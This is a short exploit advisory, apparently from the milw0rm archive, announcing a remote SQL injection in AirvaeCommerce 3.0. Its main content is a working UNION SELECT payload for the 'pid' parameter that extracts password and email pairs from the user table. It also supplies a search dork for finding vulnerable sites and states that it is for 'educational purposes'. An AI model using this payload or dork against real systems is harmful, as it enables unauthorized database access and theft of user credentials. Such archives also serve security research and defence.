34 lines
No EOL
1.8 KiB
Text
34 lines
No EOL
1.8 KiB
Text
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|
|
| _ __ __ __ ______ |
|
|
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
|
|
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
|
|
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
|
|
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|
|
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
|
|
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
|
|
| \ \____/ >> Kings of injection |
|
|
| \/___/ |
|
|
| &nb sp; |
|
|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|
|
Title :: Remote SQL Injection
|
|
|
|
Author :: QTRinux [Qataro (at) hotmail (dot) Com]
|
|
Application :: AirvaeCommerce 3.0
|
|
|
|
Download :: http://www.airvaecommerce.com
|
|
Price :: $179
|
|
Dork 1 :: powered by AirvaeCommerce 3.0
|
|
|
|
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
|
|
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
|
|
--------------------------------------------[C o n t e x t]-----------------------------------------
|
|
|
|
Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL]
|
|
Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
|
|
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*
|
|
|
|
Note : Some site used SELECT statements have a different number of columns about 45 .
|
|
|
|
-------------------------------------------[End of context]----------------------------------------
|
|
|
|
# milw0rm.com [2008-05-29] |